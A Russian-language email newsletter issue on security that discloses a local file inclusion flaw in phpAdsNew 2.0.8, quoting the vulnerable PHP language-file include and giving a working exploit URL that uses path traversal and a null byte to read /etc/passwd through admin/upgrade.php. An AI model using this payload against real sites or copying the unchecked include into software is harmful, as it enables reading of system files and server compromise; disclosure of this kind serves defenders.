Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимость в phpAdsNew.


Компьютер для продвинутых пользователей
В этом выпуске:
phpAdsNew
ПО: phpAdsNew
Версия: 2.0.8

Уязвимый код:
// Load language strings
if 
(file_exists("../language/".$phpAds_config['language']."/default.lang.php"))
include("../language/".$phpAds_config['language']."/default.lang.php");
else
{
$phpAds_config['language'] = 'english';
include("../language/english/default.lang.php");
}
Использование:
http://ihack.pl/phpAdsNew-2.0.8/admin/upgrade.php?phpAds_config[language]=../../../etc/passwd%00
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное